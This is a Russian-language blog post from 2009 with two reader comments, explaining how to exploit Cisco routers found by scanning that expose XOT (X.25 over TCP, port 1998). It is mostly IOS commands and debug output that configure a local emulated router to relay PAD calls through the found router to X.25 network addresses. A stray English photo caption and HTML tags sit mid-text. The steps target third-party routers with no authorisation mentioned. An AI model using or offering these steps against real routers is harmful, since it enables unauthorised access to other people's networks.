25 Сентябрь, 2009

Проникновение в сеть… или юзаем XOT!

И так, если XOT у вас найден, теперь нужно им как то воспользоватся… Если же нет, продолжаем сканить :)) В предыдущих постах я рассказывал о том как установить эмулятор Cisco и как произвести первоначальную конфигурацию:

* Приручаем киску
* Обучаем Cisco

AN ETHICAL HACKER DEMONSTRATES HOW EASY IT IS TO OPEN A PASSWORD PROTECTED DATA FILE IN THE TELEGRAPH OFFICES.</p>
<p> FILENAME:DTCK-HACKER4

Теперь настроим наш роутер на работу с XOT и для начала настроим роутинг для доступа из него в Интернет. Для этого нам понадобится комп. с выходом в интернет и настроенным NAT т.к. ip нашего роутера локальный. Загружаемся и войдя в режим конфигурирования настраиваем роутинг.

Router>enable
Password:
Router#conf term
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#ip route 0.0.0.0 0.0.0.0 192.168.0.1 (* вместо 192.168.0.1 вводим IP компьютера с выходом в интернет)
или
ip default-gateway 192.168.0.1

Нажимаем CNTL+Z и проверяем всё ли у нас работает:

Router>telnet X.X.X.X 1998 (* вместо X.X.X.X вводим IP найденного при скане Cisco с XOT)
Trying X.X.X.X, 1998 … Open

[Connection to X.X.X.X closed by foreign host]

Если появилось “Open” значит все хорошо и можно продолжать дальше, если нет, то или хост не доступен и пробуем другой, либо NAT не работает…

Теперь необходимо прикрутить ПАД к нашему роутеру.

Router>enable
Password:
Router#conf term
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#service pad to-xot
Router(config)#x25 routing
Router(config)#x25 route .* xot X.X.X.X (* вместо X.X.X.X вводим IP найденного при скане Cisco с XOT)

Нажимаем CNTL+Z и включаем режим отладки:

Router#debug x25 xot
X.25 packet debugging is on
X.25 debug output restricted to protocol XOT

Тестируем с помощью любого NUA который предположительно должен работать:

Router#pad 02501111
Trying 02501111…
% Connection refused by remote host

Router#
*Mar 1 00:10:52.297: [X.X.X.X,1998/192.168.0.77,29487]: XOT O P2 Call (19) 8 lci 1
*Mar 1 00:10:52.297: From (0): To (8): 02501111
*Mar 1 00:10:52.301: Facilities: (6)
*Mar 1 00:10:52.301: Packet sizes: 128 128
*Mar 1 00:10:52.301: Window sizes: 2 2
*Mar 1 00:10:52.301: Call User Data (4): 0×01000000 (pad)

и смотрим вывод команды debug, например такой:

*Mar 1 00:10:52.309: [X.X.X.X,1998/192.168.0.77,29487]: XOT cx closed

и вот на основании этой информации мы и выясняем рабочий это XOT или нет. Если рабочий то мы подключимся к указанному NUA, а если не подключились то смотрим что выдает нам debug (*в примере порт закрыт).

Удачи!!

  1. ManInBox

    Птяница, Август 20, 2010 - 19:31:08

    У меня эмулятор циски стоит на том же компе на котором есть интернет причем через 3G модем и nat не получается настроить, как можно сделать доступ к инету из циски в таком случае? Как настроить маршрутизацию?

  2. Soldier

    Вторник, Январь 11, 2011 - 06:33:31

    Можно через утилиту tcppm из комплекта с 3proxy запустить портмаппинг порта на нужный хост а в конфиге циски прописать свой локальный адрес

Добавить комментарий

Заполните форму ниже для добавления ваших комментариев

Инофрмация о пользователе





Добавить Ваш комментарий


Web proxy